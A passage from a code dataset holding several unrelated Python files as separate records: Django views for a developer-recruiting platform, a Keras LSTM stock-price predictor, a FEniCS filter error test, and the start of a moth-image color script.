False)","sub_path":"grandpyapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"541592380","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.db.models.aggregates import Max\nfrom django.core.paginator import Paginator\nfrom collections import Counter\nfrom django.urls import reverse\nimport requests\n\nimport json\nfrom decouple import config\n\nimport base64\nimport urllib.parse\nfrom django.contrib import messages\nfrom django.core import mail\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\nfrom accounts.forms import ProfileTypeForm, DeveloperFillingDetailsForm, RecruiterFillingDetailsForm\nfrom transactions.models import Transaction, Candidate,OpenCall,Applications\nfrom invitations.models import Invitation\nfrom projects.models import Project, Framework\nfrom frontend.form import Projectinvite, EditProjectForm,Submissions,Portfolio_form,Github_form,Experience_Form,About\nfrom frontend.models import candidatesprojects, devs, recruiters,submissions,Portfolio,Github,Experience\nfrom classroom.models import TakenQuiz,Student\nfrom marketplace.models import Job\nfrom taggit.models import TaggedItem\n@login_required\ndef developer_filling_details(request, current_profile):\n if request.method == 'POST':\n developer_filling_details_form = DeveloperFillingDetailsForm(request.POST, request.FILES)\n if developer_filling_details_form.is_valid():\n current_profile.github_repo = developer_filling_details_form.cleaned_data['github_repo']\n current_profile.linkedin_url = developer_filling_details_form.cleaned_data['linkedin_url']\n current_profile.portfolio = developer_filling_details_form.cleaned_data['portfolio']\n current_profile.language = developer_filling_details_form.cleaned_data['language']\n current_profile.framework = developer_filling_details_form.cleaned_data['framework']\n current_profile.years = developer_filling_details_form.cleaned_data['years'],\n current_profile.gender = developer_filling_details_form.cleaned_data['gender']\n current_profile.availabilty = developer_filling_details_form.cleaned_data['availabilty']\n current_profile.country = developer_filling_details_form.cleaned_data['country']\n current_profile.phone_number = developer_filling_details_form.cleaned_data['phone_number']\n current_profile.stage = 'complete'\n current_profile.save()\n\n user = User.objects.get(username=request.user)\n exp1 = ''\n exp2 = ''\n # add tags to saved profile\n if user.profile.years == \"('1-2',)\":\n exp1 = 'Entry'\n exp2 = 'Junior'\n elif user.profile.years == \"('2-4',)\":\n exp1 = 'Junior'\n exp2 = 'Mid-Level'\n elif user.profile.years == \"('4-above',)\":\n exp1 = 'Mid-Level'\n exp2 = 'Senior'\n\n profile_tags = [current_profile.language, current_profile.framework, exp1, exp2, current_profile.country.name, current_profile.availabilty]\n\n print('profile_tags-------------------> ', profile_tags)\n\n current_profile.tags.add(profile_tags[0], profile_tags[1], profile_tags[2], profile_tags[3], profile_tags[4], profile_tags[5])\n\n return redirect(reverse('frontend:index'))\n else:\n developer_filling_details_form = DeveloperFillingDetailsForm()\n return render(request, 'frontend/developer/developer_filling_details.html',\n {'developer_filling_details_form': developer_filling_details_form})\n\n\n@login_required\ndef recruiter_filling_details(request, current_profile):\n if request.method == 'POST':\n recruiter_filling_details_form = RecruiterFillingDetailsForm(request.POST)\n if recruiter_filling_details_form.is_valid():\n current_profile.company = recruiter_filling_details_form.cleaned_data['company']\n current_profile.job_role = recruiter_filling_details_form.cleaned_data['job_role']\n current_profile.industry = recruiter_filling_details_form.cleaned_data['industry']\n current_profile.country = recruiter_filling_details_form.cleaned_data['country']\n current_profile.company_url = recruiter_filling_details_form.cleaned_data['company_url']\n current_profile.stage = 'complete'\n current_profile.save()\n return redirect(reverse('frontend:index'))\n else:\n recruiter_filling_details_form = RecruiterFillingDetailsForm()\n return render(request, 'frontend/recruiter/recruiter_filling_details.html',\n {'recruiter_filling_details_form': recruiter_filling_details_form})\n\n\n@login_required\ndef profile_type_selection(request, current_profile):\n if request.method == 'POST':\n profile_type_form = ProfileTypeForm(request.POST)\n if profile_type_form.is_valid():\n profile_type = profile_type_form.cleaned_data['profile_type']\n current_profile.user_type = profile_type\n if profile_type == 'developer':\n current_profile.stage = 'developer_filling_details'\n # test_registration = Student(user=request.user)\n # test_registration.save()\n elif profile_type == 'recruiter':\n current_profile.stage = 'recruiter_filling_details'\n current_profile.save()\n return redirect(reverse('frontend:index'))\n else:\n profile_type_form = ProfileTypeForm()\n return render(request, 'frontend/profile_type_selection.html', {'profile_type_form': profile_type_form})\n\n\ndef index(request):\n if request.user.is_authenticated:\n current_profile = request.user.profile\n transactions = Transaction.objects.filter(user=request.user).filter(stage='complete')\n if request.user.profile.stage == 'profile_type_selection':\n return profile_type_selection(request, current_profile)\n elif request.user.profile.stage == 'developer_filling_details':\n return developer_filling_details(request, current_profile)\n elif request.user.profile.stage == 'recruiter_filling_details':\n return recruiter_filling_details(request, current_profile)\n elif request.user.profile.stage == 'complete':\n if request.user.profile.user_type == 'developer':\n try:\n # user =request.user\n # tags = user.profile.tags.all()\n student = Student.objects.get(user_id=request.user.id)\n passedquizz = TakenQuiz.objects.filter(score__gt=50).filter(student_id=student)\n return render(request, 'frontend/developer/developer.html', {'passedquizz': passedquizz})\n except Student.DoesNotExist:\n obj = Student(user=request.user)\n obj.save()\n return render(request, 'frontend/developer/developer.html')\n\n elif request.user.profile.user_type == 'recruiter':\n jobs = Job.objects.filter(posted_by=request.user)\n return render(request, 'frontend/recruiter/recruiter.html', {'transactions': transactions,'jobs':jobs})\n else:\n return home(request)\n\n\ndef home(request):\n return render(request, 'frontend/landing.html')\n\n\n@login_required\ndef activity(request):\n if request.user.is_authenticated:\n transactions = Transaction.objects.filter(user=request.user)\n opencalls =OpenCall.objects.filter(recruiter=request.user)\n alltransactions =[]\n allopencalls =[]\n for transaction in transactions:\n alltransactions.append(transaction.id)\n for opencall in opencalls:\n allopencalls.append(opencall.transaction.id)\n\n res=set(alltransactions)-set(allopencalls)\n\n closedprojects =list(res)\n\n\n if request.user.profile.user_type == 'recruiter':\n return render(request, 'frontend/recruiter/my-activity.html', {'transactions': transactions,'closedprojects':closedprojects,'allopencalls':allopencalls})\n elif request.user.profile.user_type == 'developer':\n return render(request, 'frontend/developer/my-activity.html', {'transactions': transactions})\n\n@login_required\ndef tracker(request, id):\n project = Transaction.objects.get(id=id)\n candidates = candidatesprojects.objects.filter(transaction=id)\n submitted = submissions.objects.filter(transaction=id).all()\n return render(request, 'frontend/recruiter/tracker.html', {'candidates': candidates, 'project': project,'submitted':submitted})\n\n\n@login_required\ndef inprogress(request):\n user = request.user.id\n projects = candidatesprojects.objects.filter(candidate=user)\n return render(request, 'frontend/developer/inprogress.html', {'projects': projects})\n\n\n@login_required\ndef invites(request):\n candidates = Candidate.objects.filter(email=request.user.email)\n return render(request, 'frontend/developer/invites.html', {'candidates': candidates})\n\n\n@login_required\ndef projectdetails(request, id):\n form=Submissions()\n transaction=candidatesprojects.objects.get(id=id)\n projectinvite = Projectinvite()\n if Applications.objects.filter(candidate_id=request.user.id).filter(transaction_id=transaction.transaction_id).exists():\n opencall =Applications.objects.filter(candidate_id=request.user.id).filter(transaction_id=transaction.transaction_id).get()\n else:\n opencall=None\n project = candidatesprojects.objects.get(id=id)\n return render(request, 'frontend/developer/projectdetails.html',\n {'project': project, 'projectinvite': projectinvite,'opencall':opencall,'form':form})\n\n\n@login_required\ndef pendingproject(request, transaction_id):\n acceptedinvites = candidatesprojects.objects.filter(transaction_id=transaction_id, candidate=request.user)\n transaction = Transaction.objects.get(id=transaction_id)\n\n return render(request, 'frontend/developer/pendingproject.html',\n {'transaction': transaction, 'acceptedinvites': acceptedinvites})\n\n@login_required\ndef projectinvites(request, transaction_id):\n user = request.user.id\n trans_id = Transaction.objects.get(id=transaction_id)\n currentcandidate = User.objects.get(id=user)\n\n acceptedinvite = candidatesprojects(transaction=trans_id, candidate=currentcandidate, stage='invite-accepted')\n acceptedinvite.save()\n return redirect('frontend:buildproject')\n\n@login_required\ndef update_candidateprojects(request, candidateproject_id, transaction_id):\n transaction = Transaction.objects.get(id=transaction_id)\n candidatesproject = candidatesprojects.objects.get(id=candidateproject_id)\n candidatesproject.stage = 'project-in-progress'\n candidatesproject.save()\n return HttpResponseRedirect('/projectdetails/%s' % candidateproject_id)\n\n@login_required\ndef update_finished(request, candidateproject_id, transaction_id):\n transaction = Transaction.objects.get(id=transaction_id)\n candidatesproject = candidatesprojects.objects.get(id=candidateproject_id)\n candidatesproject.stage = 'project-completed'\n candidatesproject.save()\n return HttpResponseRedirect('/projectdetails/%s' % candidateproject_id)\n\n@login_required\ndef update_finishedopencall(request, project_id, transaction_id):\n if request.method == 'POST':\n submission_form = Submissions(request.POST)\n if submission_form.is_valid():\n transaction = Transaction.objects.get(id=transaction_id)\n\n subject = 'Project submission'\n repo=submission_form.cleaned_data['repositorylink']\n demo = submission_form.cleaned_data['demolink']\n html_message = render_to_string('invitations/email/submissions.html',\n {'dev': request.user, 'transaction': transaction,'demo':demo,'repo':repo})\n plain_message = strip_tags(html_message)\n from_email = 'codeln@codeln.com'\n to = 'dennis@codeln.com'\n mail.send_mail(subject, plain_message, from_email, [to], html_message=html_message)\n\n candidatesproject = candidatesprojects.objects.get(id=project_id)\n candidatesproject.stage = 'project-completed'\n candidatesproject.save()\n submit = submissions(candidate=request.user,transaction=transaction,demo=demo,repo=repo)\n submit.save()\n return HttpResponseRedirect('/projectdetails/%s' % project_id)\n\ndef pricing(request):\n return render(request, 'frontend/pricing.html')\n\n\ndef dev(request):\n return render(request, 'frontend/dev.html')\n\ndef competitions(request):\n return render(request, 'frontend/recruiter/competitions.html')\n\ndef takenquizzes(request):\n taken = TakenQuiz.objects.all()\n allquizzes = TakenQuiz.objects.filter(score__gte=50).all()\n\n return render(request, 'frontend/recruiter/takenquizzes.html',{'allquizzes':allquizzes,'taken':taken})\n\ndef howitworks(request):\n return render(request, 'frontend/how.html')\n\n\ndef report(request, email, transaction_id):\n user = User.objects.get(email=email)\n transaction = Transaction.objects.get(id=transaction_id)\n return render(request, 'frontend/recruiter/report.html', {'user': user, 'transaction': transaction})\n\n\ndef onboarddevs(request):\n for alluser in User.objects.all():\n if alluser.profile.user_type == 'developer':\n if alluser.profile.stage == 'complete':\n if not devs.objects.filter(email=alluser.email).exists():\n dev = devs()\n dev.email = alluser.email\n dev.firstname = alluser.first_name\n dev.lastname = alluser.last_name\n dev.language = alluser.profile.language\n dev.framework = alluser.profile.framework\n dev.country = alluser.profile.country\n dev.github = alluser.profile.github_repo\n dev.linkedin = alluser.profile.linkedin_url\n dev.portfolio = alluser.profile.portfolio\n dev.save()\n\n return redirect(reverse('frontend:seedevs'))\n\n\ndef onboardrecruiters(request):\n for alluser in User.objects.all():\n if alluser.profile.user_type == 'recruiter':\n if alluser.profile.stage == 'complete':\n if not recruiters.objects.filter(email=alluser.email).exists():\n recruiter = recruiters()\n recruiter.email = alluser.email\n recruiter.firstname = alluser.first_name\n recruiter.lastname = alluser.last_name\n recruiter.company = alluser.profile.company\n recruiter.companyurl = alluser.profile.company_url\n recruiter.country = alluser.profile.country\n recruiter.save()\n\n return redirect(reverse('frontend:seerecruiters'))\n\n\ndef credits(request):\n return render(request, 'frontend/credits.html')\n\ndef management(request):\n return render(request, 'frontend/recruiter/management.html')\n\n\ndef privacy(request):\n return render(request, 'frontend/privacy.html')\n\n\ndef terms(request):\n return render(request, 'frontend/terms.html')\n\n\ndef sample(request):\n return render(request, 'frontend/sample.html')\n\n\ndef page_404(request):\n return render(request, 'frontend/error_pages/404.html')\n\n\ndef page_500(request):\n return render(request, 'frontend/error_pages/500.html')\n\n\ndef seedevs(request):\n developers = devs.objects.all()\n return render(request, 'frontend/recruiter/devlist.html', {'developers': developers})\n\n\ndef seerecruiters(request):\n payers = recruiters.objects.all()\n return render(request, 'frontend/recruiter/recruiterslist.html', {'payers': payers})\n\n@login_required\ndef manageprojects(request):\n projects = Project.objects.all()\n return render(request, 'frontend/recruiter/projects.html', {'projects': projects})\n\n@login_required\ndef managetransactions(request):\n transactions = Transaction.objects.all()\n return render(request, 'frontend/recruiter/transactions.html', {'transactions': transactions})\n\n@login_required\ndef editproject(request, project_id):\n instance = get_object_or_404(Project, id=project_id)\n project = Project.objects.get(id=project_id)\n form = EditProjectForm(request.POST or None, instance=instance)\n if form.is_valid():\n form.save()\n return redirect('frontend:manageprojects')\n\n return render(request, 'frontend/recruiter/editproject.html',\n {'project': project, 'form': form})\n\n@login_required\ndef deleteproject(request, project_id):\n Project.objects.filter(id=project_id).delete()\n return redirect('frontend:manageprojects')\n@login_required\ndef addproject(request):\n form = EditProjectForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('frontend:manageprojects')\n return render(request, 'frontend/recruiter/addproject.html',\n { 'form': form})\n\n@login_required\ndef edittransactions(request, transaction_id):\n transaction = Transaction.objects.get(id=transaction_id)\n candidates =Candidate.objects.filter(transaction_id=transaction_id)\n return render(request, 'frontend/recruiter/edittransaction.html',{'transaction':transaction,'candidates':candidates})\n@login_required\ndef deletetransaction(request,transaction_id):\n OpenCall.objects.filter(transaction_id=transaction_id).delete()\n Transaction.objects.filter(id=transaction_id).delete()\n Candidate.objects.filter(transaction_id=transaction_id).delete()\n return redirect('frontend:managetransactions')\ndef closetransaction(request,transaction_id):\n project = Transaction.objects.get(id=transaction_id)\n project.closed = True\n project.save()\n return redirect('frontend:managetransactions')\n@login_required\ndef buildproject(request):\n return render(request, 'classroom/students/worldprojects.html')\n@login_required\ndef calltoapply(request):\n alltransactions=Transaction.objects.filter(stage='complete').filter(closed=False)\n complete=[]\n for i in alltransactions:\n complete.append(i.id)\n\n opportunities = OpenCall.objects.all()\n opencalls=[]\n for io in opportunities:\n opencalls.append(io.transaction.id)\n\n payedopencalls = set(complete)&set(opencalls)\n payed = list(payedopencalls)\n\n qualifys = Applications.objects.filter(candidate=request.user)\n student = Student.objects.get(user_id=request.user.id)\n passedquizz = TakenQuiz.objects.filter(score__gte=50).filter(student_id=student)\n\n allsubjectspassed = []\n for d in passedquizz:\n allsubjectspassed.append(d.quiz.subject)\n\n uniquesubjects = list(set(allsubjectspassed))\n uniquelangs=[]\n langs = {}\n for unique in uniquesubjects:\n izzes = TakenQuiz.objects.filter(quiz__subject_id=unique.id).filter(student_id=student)\n\n for i in izzes:\n langs[i.quiz.subject.name] = i.quiz.subject.name\n original =[]\n taken = []\n for oppo in payed:\n original.append(oppo)\n for qualify in qualifys:\n taken.append(qualify.transaction.id)\n untaken=[]\n\n non = set(original) - set(taken)\n untaken=list(non)\n untakenopportunities =[]\n for untake in untaken:\n untakentrans =Transaction.objects.get(id=untake)\n untakenopportunities.append(untakentrans.id)\n\n return render(request, 'classroom/students/opencalls.html',{'opportunities':opportunities,\n 'qualifys':qualifys,'a':original,'taken':taken,'untaken':untaken,'langs':langs,'qualify':qualifys})\n@login_required\ndef apply(request,opportunity_id):\n language =OpenCall.objects.get(transaction=opportunity_id)\n student = Student.objects.get(user_id=request.user.id)\n passedquizz = TakenQuiz.objects.filter(score__gte=50).filter(student_id=student)\n\n\n allsubjectspassed = []\n for d in passedquizz:\n allsubjectspassed.append(d.quiz.subject)\n\n uniquesubjects = list(set(allsubjectspassed))\n\n\n for pa in uniquesubjects:\n blu=TakenQuiz.objects.filter(quiz__subject=pa).filter(student_id=student)\n doublequizzes =[]\n for paz in blu:\n doublequizzes.append(paz.score)\n\n\n if pa.name == language.transaction.framework.language.name or pa.name == language.transaction.framework.name: #TODO: let it be explcitly for framework if pa.name==language.project.framework\n qualifiedcandidate = Applications(recruiter=language.recruiter,transaction=language.transaction,project=language.project,candidate=request.user,stage='application sent',score=max(doublequizzes))\n\n qualifiedcandidate.save()\n\n\n\n\n return redirect('frontend:calltoapply')\n@login_required\ndef opencalltracker(request,trans_id):\n candidatespicked = Candidate.objects.filter(transaction_id=trans_id)\n\n candidates = Applications.objects.filter(transaction=trans_id).order_by('-score')\n return render(request,'frontend/recruiter/opencall.html',{'candidates':candidates,'trans_id':trans_id,'picked':candidatespicked})\n@login_required\ndef pickcandidates(request,trans_id,candidate_id):\n candidate =User.objects.get(id=candidate_id)\n transaction =Transaction.objects.get(id=trans_id)\n application= Applications.objects.filter(transaction = trans_id).filter(candidate_id=candidate_id).get()\n application.stage = 'accepted'\n newcandidate=Candidate(email=application.candidate.email,first_name=application.candidate.first_name,last_name=application.candidate.last_name,transaction=transaction)\n newcandidate.save()\n application.save()\n subject = 'Accepted for next stage'\n html_message = render_to_string('invitations/email/opencallaccepted.html',\n {'dev': request.user,'company':transaction})\n plain_message = strip_tags(html_message)\n from_email = 'codeln@codeln.com'\n to = candidate.email\n mail.send_mail(subject, plain_message, from_email, [to], html_message=html_message)\n return HttpResponseRedirect('/opencalltracker/%s' % trans_id)\n\n\n@login_required\ndef portfolio(request):\n try:\n\n candidate = Github.objects.get(candidate=request.user)\n user = candidate.github_username\n username = config('GITHUB_USERNAME',default='GITHUB_USERNAME')\n token = config('ACCESS_TOKEN',default='ACCESS_TOKEN')\n json_data = requests.get('https://api.github.com/users/' + user, auth=(username, token)).json()\n\n form = Portfolio_form()\n experience_form = Experience_Form()\n about_form = About()\n repo = 'https://api.github.com/users/' + user + '/repos'\n repos = requests.get(repo, auth=(username, token)).json()\n paginator = Paginator(repos, 8)\n\n page = request.GET.get('page')\n repoz = paginator.get_page(page)\n languages = []\n\n for i in repos:\n for x in i:\n languages.append(i['language'])\n\n counter = Counter(languages)\n labels = []\n c = {}\n items = []\n for z in counter:\n c[z] = counter[z]\n labels.append(z)\n items.append(counter[z])\n data = {\n \"labels\": labels,\n \"data\": items,\n }\n student = Student.objects.get(user_id=request.user.id)\n verified_skills = TakenQuiz.objects.filter(student=student).filter(score__gte=50).all()\n skill=[]\n for verified_skill in verified_skills:\n skill.append(verified_skill.quiz.subject.name)\n skillset=set(skill)\n skills =list(skillset)\n\n\n\n experiences=Experience.objects.filter(candidate=request.user).all()\n verified_projects = Portfolio.objects.filter(candidate=request.user).all()\n return render(request, 'frontend/developer/portfolio.html',\n {'json': json_data, 'repos': repoz, 'data': data, 'c': c, 'form': form,\n 'verified_projects': verified_projects,'experience_form':experience_form,'experiences':experiences,\n 'skills':skills,'candidate':candidate,'about_form':about_form})\n except Github.DoesNotExist:\n form = Github_form()\n\n return render(request, 'frontend/developer/github.html',{'form':form})\n\n\n@login_required\ndef newproject(request):\n if request.method == 'POST':\n myprojects = Portfolio_form(request.POST)\n if myprojects.is_valid():\n title = myprojects.cleaned_data['title']\n description = myprojects.cleaned_data['description']\n repo = myprojects.cleaned_data['repository_link']\n demo = myprojects.cleaned_data['demo_link']\n newprojo =Portfolio(candidate=request.user,demo_link=demo,repository_link=repo,title=title,description=description)\n newprojo.save()\n return redirect(reverse('frontend:portfolio'))\n@login_required\ndef get_data(request, *args, **kwargs):\n try:\n candidate = Github.objects.get(candidate=request.user)\n user = candidate.github_username\n username = config('GITHUB_USERNAME',default='GITHUB_USERNAME')\n token = config('ACCESS_TOKEN',default='ACCESS_TOKEN')\n repo = 'https://api.github.com/users/' + user + '/repos'\n repos = requests.get(repo, auth=(username, token)).json()\n\n languages = []\n for i in repos:\n for x in i:\n languages.append(i['language'])\n counter = Counter(languages)\n labels = []\n items = []\n for z in counter:\n labels.append(z)\n items.append(counter[z])\n data = {\n \"labels\": labels,\n \"data\": items,\n }\n\n return JsonResponse(data)\n\n\n except Github.DoesNotExist:\n form = Github_form()\n\n return render(request, 'frontend/developer/github.html',{'form':form})\n\ndef github(request):\n if request.method == 'POST':\n newuser = Github_form(request.POST)\n if newuser.is_valid():\n username = newuser.cleaned_data['github_username']\n password =newuser.cleaned_data['password']\n\n if requests.get('https://api.github.com/users/' + username, auth=(username, password)):\n newgithubprofile = Github(candidate=request.user, github_username=username)\n newgithubprofile.save()\n return redirect(reverse('frontend:portfolio'))\n else:\n\n\n return redirect(reverse('frontend:portfolio'))\n\n return redirect(reverse('frontend:portfolio'))\ndef experience(request):\n if request.method == 'POST':\n new_experience = Experience_Form(request.POST)\n if new_experience.is_valid():\n title = new_experience.cleaned_data['title']\n company = new_experience.cleaned_data['company']\n description = new_experience.cleaned_data['description']\n location = new_experience.cleaned_data['location']\n duration = new_experience.cleaned_data['duration']\n experience = Experience(candidate=request.user,title=title,description=description,company=company,location=location,duration=duration)\n experience.save()\n return redirect(reverse('frontend:portfolio'))\n else:\n return redirect(reverse('frontend:portfolio'))\n\n\n return redirect(reverse('frontend:portfolio'))\n\n@login_required\ndef editportfolioproject(request,project_id):\n instance = get_object_or_404(Portfolio, id=project_id)\n project = Portfolio.objects.get(id=project_id)\n form = Portfolio_form(request.POST or None, instance=instance)\n if form.is_valid():\n form.save()\n return redirect('frontend:portfolio')\n\n return render(request, 'frontend/developer/editproject.html',{'project': project,'form':form})\n\ndef about(request,candidate_id):\n instance = get_object_or_404(Github,candidate_id=candidate_id)\n if request.method =='POST':\n new_about = About(request.POST or None,instance=instance)\n if new_about.is_valid():\n new_about.save()\n return redirect('frontend:portfolio')\n return redirect(reverse('frontend:portfolio'))\n\n\n","sub_path":"frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"262576852","text":"import pandas as pd\nimport numpy as np\nimport tensorflow.keras\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.sequence import TimeseriesGenerator\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\n\nfilename = \"GOOGL.csv\"\ndf = pd.read_csv(filename)\nprint(df.info())\ndf['Date'] = pd.to_datetime(df['Date'])\ndf.set_axis(df['Date'], inplace=True)\ndf.drop(columns=['Open', 'High', 'Low', 'Volume'], inplace=True)\n\nclose_data = df['Close'].values\nclose_data = close_data.reshape((-1,1))\n\nsplit_percent = 0.80\nsplit = int(split_percent*len(close_data))\n\nclose_train = close_data[:split]\nclose_test = close_data[split:]\n\ndate_train = df['Date'][:split]\ndate_test = df['Date'][split:]\n\nprint(len(close_train))\nprint(len(close_test))\n\nlook_back = 15\n\ntrain_generator = TimeseriesGenerator(close_train, close_train, length=look_back, batch_size=20) \ntest_generator = TimeseriesGenerator(close_test, close_test, length=look_back, batch_size=1)\n\nmodel = Sequential()\nmodel.add(\n LSTM(10,\n activation='relu',\n input_shape=(look_back,1))\n)\nmodel.add(Dense(1))\nmodel.compile(optimizer='adam', loss='mse')\n\nnum_epochs = 25\nmodel.fit_generator(train_generator, epochs=num_epochs, verbose=1)\n\nprediction = model.predict_generator(test_generator)\n\nclose_train = close_train.reshape((-1))\nclose_test = close_test.reshape((-1))\nprediction = prediction.reshape((-1))\nimport plotly.express as go\n\n\ntrace1 = go.Scatter(\n x = date_train,\n y = close_train,\n mode = 'lines',\n name = 'Data'\n)\ntrace2 = go.Scatter(\n x = date_test,\n y = prediction,\n mode = 'lines',\n name = 'Prediction'\n)\ntrace3 = go.Scatter(\n x = date_test,\n y = close_test,\n mode='lines',\n name = 'Ground Truth'\n)\nlayout = go.Layout(\n title = \"Google Stock\",\n xaxis = {'title' : \"Date\"},\n yaxis = {'title' : \"Close\"}\n)\nfig = go.Figure(data=[trace1, trace2, trace3], layout=layout)\nfig.show()","sub_path":"scr.py","file_name":"scr.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"483309510","text":"from dolfin import *\nimport math as m\nimport numpy as np\nimport csv\n\nmethodname = \"EFR\"\nS = 1.0 #scale such that delta = S*h\nP = 2 # polynomial degree of FE\nR = 2\n\n\ndt = 0.001\nT = 0.1\n\n\nN = 0\nlvl = 1\n\nsigma = 1.0\nmu = 10**(-6)\nvelocity = as_vector([2.0,3.0])\n\nmyfile = 'errorEFR403b.csv'\n\nfor nx in [50,100,200,400,800]:\n\tdelta = 1.0#S*1.0/nx\n\tprint(delta)\n\tt = 0.0\n\tfolder = \"040218/dt\"+str(dt)+\"h\"+str(nx)+\"_\"\n\n\tu_exact = Expression('sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1])', degree = R)\n\t#u_ = Expression('2*pow(DOLFIN_PI, 2)*pow(delta, 2)*sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1]) + sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1])', degree = R, delta = delta)\n\n\tu_ = Expression('sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1]) + 2*pow(DOLFIN_PI, 2)*sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1])', degree=R)\n\tu_D = Expression(u_exact.cppcode, degree = R)\n\n\tmesh = UnitSquareMesh(nx,nx)\n\th = CellDiameter(mesh)\n\tQ = FunctionSpace(mesh, \"CG\", P)\n\n\n\t# Set up boundary condition\n\tdef boundary(x, on_boundary):\n\t\treturn on_boundary\n\tbc = DirichletBC(Q, u_D, boundary)\n\n\n\t# Don't Modify Below This! -----------#\n\n\t# Test and trial functions\n\tu, v = TrialFunction(Q), TestFunction(Q)\n\n\tu_tilde0 = Function(Q)\n\n\n\t# Define variational problem for step 2a (apply Helmholz filter)\n\t# Note: only RHS changes, so we can keep the same a2 throughout\n\n\ta2 = v*u*dx + delta*delta*dot(grad(v), grad(u))*dx #lhs(F_Hfilter)\n\tA2 = assemble(a2)\n\n\t# Define indicator function to evaluate current time step\n\tdef a(u_tilde, u_, t):\n\t\tindicator = Expression('sqrt((a-b)*(a-b))', degree = 2, a = u_, b = u_tilde)\n\t\tindicator = interpolate(indicator, Q)\n\t\tmax_ind = np.amax(indicator.vector().get_local())#.vector().array())\n\n\t\t# Normalize indicator such that it's between [0,1].\n\t\tif max_ind < 1:\n\t\t max_ind = 1.0\n\n\t\tindicator = Expression('a/b', degree = 2, a = indicator, b = max_ind)\n\t\tindicator = interpolate(indicator, Q) \n\t\tindicator.rename('a','a')\n\t\t#out_file_ind << (indicator, float(t))\n\t\treturn indicator\n\tL2 = v*u_*dx\n\n\t# def L2(u_): # input is intermediate velocity OR previous u_tilde solution\n\t\t# L2 = v*u_*dx\n\t\t# return L2\n\n\t# Define variational problem for step 2b (evaluate indicator and find filtered solution)\n\tdef a3(ind):\n\t\ta3 = v*u*dx + delta*delta*dot(grad(v), ind*grad(u))*dx\n\t\treturn a3\n\n\n\t#L3 = v*u_*dx\n\n\t# --- End EFR --- #\n\n\tnum_steps = int(round(T / dt, 0)) \n\n\t# Create bilinear and linear forms\n\t# a1 = lhs(F)\n\t# L = rhs(F)\n\n\t# Assemble matrices\n\t# A1 = assemble(a1)\n\t# bc.apply(A1)\n\n\t# Create progress bar\n\tprogress = Progress('Time-stepping')\n\tset_log_level(PROGRESS)\n\n\n\t# --- Time-stepping --- #\n\n\tout_file_ind = File(folder+\"a_N\"+str(N)+\"_EFR.pvd\") # indicator function\n\tout_file_ubar = File(folder+\"ubar_N\"+str(N)+\"_EFR.pvd\") # filtered solution\n\n\t# for n in range(num_steps):\n\t\t# Step 1 Solve on Coarse Grid\n\n\t\t# b = assemble(L)\n\t\t# bc.apply(b)\n\t\t# solve(A1, u_.vector(), b, \"gmres\")\n\n\t\t# Step 2a Solve Helmholtz filter\n\t\t# N=0\n\t#b2_0 = assemble(L2(u_))\n\tb2_0 = assemble(L2)\n\tbc_0 = DirichletBC(Q, u_D, boundary)\n\tbc_0.apply(b2_0)\n\tbc_0.apply(A2)\n\tsolve(A2, u_tilde0.vector(), b2_0, \"gmres\")\n\n\t#DF = Expression('a', degree = R, a=u_tilde0)\n\n\t\t# Step 2b Calculate Indicator and solve Ind Problem\n\t\t# ind = a(DF, u_, float(t))\n\n\t\t# A3 = assemble(a3(ind))\n\t\t# bc.apply(A3)\n\n\t\t# b3 = assemble(L3)\n\t\t# bc.apply(b3)\n\n\t\t# solve(A3, u_bar.vector(), b3, \"gmres\")\n\n\t\t# progress.update(t / T)\n\n\t\t# Update previous solution and source term\n\t\t# u_n.assign(u_bar)\n\t\t# Update current time\n\t\t# t += dt\n\t\t# f.t += dt\n\n\t# out_file_ind << (ind, float(t))\n\tout_file_ubar << (u_tilde0, float(t))\n\n\tL2 = errornorm(u_exact, u_tilde0, norm_type='L2', degree_rise=3)\n\tH1_0 = errornorm(u_exact, u_tilde0, norm_type='H10', degree_rise=3)\n\tH1 = np.sqrt(L2**2 + H1_0**2)\n\n\tffile = open(myfile,\"a+\")\n\tif near(lvl, 1):\n\t\toutputf1 = methodname+' N = '+str(N)+', t = '+str(t)+\"\\n\"\n\t\tffile.write(outputf1)\n\n\toutputf = '\\nLevel '+str(lvl)+', nx = '+str(nx)+'\\n'\n\toutputf += 'L2,' + str(L2) + 'H1,' + str(H1) +'\\n \\n'\n\tffile.write(outputf)\n\n\tlvl += 1","sub_path":"2D_adr/debug/filter_test.py","file_name":"filter_test.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"486754122","text":"import cv2 \nimport numpy as np\nimport itertools\nfrom readcsv import saveData\nfrom readcsv import readData\nfrom getColor import getColor\n\n#New Moth data\n\n\n\n\n#Get Saved Moth data\nfileList = [\"C:/Users/master/Desktop/20190629/Smarf/MothData/Mothdata01.csv\",\"C:/Users/master/Desktop/20190629/Smarf/MothData/Mothdata02.csv\",\"C:/Users/master/Desktop/20190629/Smarf/MothData/Mothdata03.csv\",\"C:/Users/master/Desktop/20190629/Smarf/MothData/Mothdata04.csv\"]\ndist_data_total=readData(fileList)\ndist_avg_data_total=[]\ndata=getColor(\"C:/Users/master/Desktop/20190629/Smarf/Picture/Adoxophyes orana/01_05.jpg\",5)\nnewdata=np.array(data)\nfor dist_data in dist_data_total:\n#dist_data = 